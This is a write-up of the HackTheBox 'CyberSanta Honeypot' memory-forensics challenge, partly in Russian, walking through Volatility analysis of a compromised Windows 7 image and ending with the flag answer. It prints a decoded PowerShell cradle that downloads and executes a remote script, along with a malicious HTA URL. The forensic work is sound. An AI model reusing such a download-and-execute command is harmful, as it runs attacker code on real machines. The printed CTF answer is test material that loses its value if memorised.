###### tags: `HackTheBox` `round 2`
# CyberSanta Honeypot
```
Santa really encourages people to be at his good list but sometimes he is a bit naughty himself. He is using a Windows 7 honeypot to capture any suspicious action. Since he is not a forensics expert, can you help him identify any indications of compromise?
Find the full URL used to download the malware
Find the malicious's process ID
Find the attackers IP
Flag Format:HTB{md5sum(http://url.com/path.foo_PID_127.0.0.1)}
Download Link: http://46.101.25.140/forensics_honeypot.zip
Санта действительно поощряет людей быть в его хорошем списке, но иногда он сам немного капризничает. Он использует ловушку Windows 7 для отслеживания любых подозрительных действий. Поскольку он не является экспертом в области криминалистики, можете ли вы помочь ему определить какие-либо признаки взлома?
Найдите полный URL-адрес, используемый для загрузки вредоносного ПО
Найдите идентификатор вредоносного процесса
Найдите IP злоумышленников
```
## Analyse with volatility
### info
```
python2 ~/git/volatility/vol.py -f ./honeypot.raw imageinfo
INFO : volatility.debug : Determining profile based on KDBG search...
Suggested Profile(s) : Win7SP1x86_23418, Win7SP0x86, Win7SP1x86_24000, Win7SP1x86
AS Layer1 : IA32PagedMemoryPae (Kernel AS)
AS Layer2 : FileAddressSpace (/home/john/Документы/ctf/hackthebox/cybersanta/honeypot/honeypot.raw)
PAE type : PAE
DTB : 0x185000L
KDBG : 0x82930c68L
Number of Processors : 1
Image Type (Service Pack) : 1
KPCR for CPU 0 : 0x82931d00L
KUSER_SHARED_DATA : 0xffdf0000L
Image date and time : 2021-11-25 19:14:12 UTC+0000
Image local date and time : 2021-11-25 11:14:12 -0800
```
### process tree
```
python2 ~/git/volatility/vol.py -f ./honeypot.raw --profile Win7SP1x86_23418 pstree
* Подозрительные процессы
.. 0x858326b8:svchost.exe 572 400 11 368 2021-11-26 05:12:17 UTC+0000
... 0x84b88788:WmiPrvSE.exe 3112 572 8 119 2021-11-25 19:13:24 UTC+0000
... 0x84ada2d0:dllhost.exe 168 572 6 88 2021-11-25 19:14:13 UTC+0000
.. 0x841e6470:cygrunsrv.exe 1872 400 6 100 2021-11-25 19:12:20 UTC+0000
... 0x858cad28:cygrunsrv.exe 1612 1872 0 ------ 2021-11-25 19:12:21 UTC+0000
.... 0x858d5d28:sshd.exe 1676 1612 4 100 2021-11-25 19:12:21 UTC+0000
. 0x85dacd28:regsvr32.exe 3108 2856 0 ------ 2021-11-25 19:12:38 UTC+0000
0x8420dd28:powershell.exe 2700 3720 13 444 2021-11-25 19:13:50 UTC+0000
. 0x85d8db00:whoami.exe 4028 2700 0 ------ 2021-11-25 19:14:01 UTC+0000
. 0x84289030:HOSTNAME.EXE 4036 2700 0 ------ 2021-11-25 19:14:01 UTC+0000
```
### Browser history
```
python2 ~/git/volatility/vol.py -f ./honeypot.raw --profile Win7SP1x86_23418 iehistory
* Подозрительные закачки:
Process: 3344 iexplore.exe Cache type "URL " at 0x709cf80 Record length: 0x380 Location: https://windowsliveupdater.com/christmas_update.hta Last modified: 2021-11-25 18:50:07 UTC+0000 Last accessed: 2021-11-25 19:13:47 UTC+0000 File Offset: 0x380, Data Offset: 0x9c, Data Length: 0xb4 File: christmas_update[1].hta
Data: HTTP/1.1 200 OK Content-Type: application/octet-stream
```
### List commands of console
```
python2 ~/git/volatility/vol.py -f ./honeypot.raw --profile Win7SP1x86_23418 cmdscan
Там видно запуск powershell, dumpit
```
### Посмотрим параметры запуска sshd, powershell и WmiPrvSE
```
sshd: python2 ~/git/volatility/vol.py -f ./honeypot.raw --profile Win7SP1x86_23418 cmdline -p 1676
WmiPrvSE: python2 ~/git/volatility/vol.py -f ./honeypot.raw --profile Win7SP1x86_23418 cmdline -p 3112
powershell: python2 ~/git/volatility/vol.py -f ./honeypot.raw --profile Win7SP1x86_23418 cmdline -p 2700
Для powershell нашлись параметры:
aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHcAaQBuAGQAbwB3AHMAbABpAHYAZQB1AHAAZABhAHQAZQByAC4AYwBvAG0ALwB1AHAAZABhAHQAZQAuAHAAcwAxACcAKQApAA==
base64 -d:
iex ((new-object net.webclient).downloadstring('https://windowsliveupdater.com/update.ps1'))
```
### info about net process
```
python2 ~/git/volatility/vol.py -f ./honeypot.raw --profile Win7SP1x86_23418 netscan
тут видим, что локальный адрес машины: 10.0.2.15
и ip, с которыми установлено соединение:
147.182.172.189
172.67.177.22
204.79.197.203
212.205.126.106
93.184.220.29
95.100.210.141
```
## flag:
```
Flag Format: HTB{echo -n "http://url.com/path.foo_PID_127.0.0.1" | md5sum}
1) https://windowsliveupdater.com/update.ps1_2700_147.182.172.189
HTB{)
2) https://windowsliveupdater.com/update.ps1_2700_172.67.177.22
HTB{}
3) https://windowsliveupdater.com/update.ps1_2700_204.79.197.203
HTB{}
4) https://windowsliveupdater.com/update.ps1_2700_212.205.126.106
HTB{}
5) https://windowsliveupdater.com/update.ps1_2700_93.184.220.29
HTB{}
6) https://windowsliveupdater.com/update.ps1_2700_95.100.210.141
HTB{}
```
"Не подходит ни один ((("
### Чутка не угадал с нагрузкой, хотя и в подозрительных закачках она засветилась
```
HTB{https://windowsliveupdater.com/christmas_update.hta_2700_147.182.172.189 | md5sum}
HTB{969b934d7396d043a50a37b70e1e010a}
```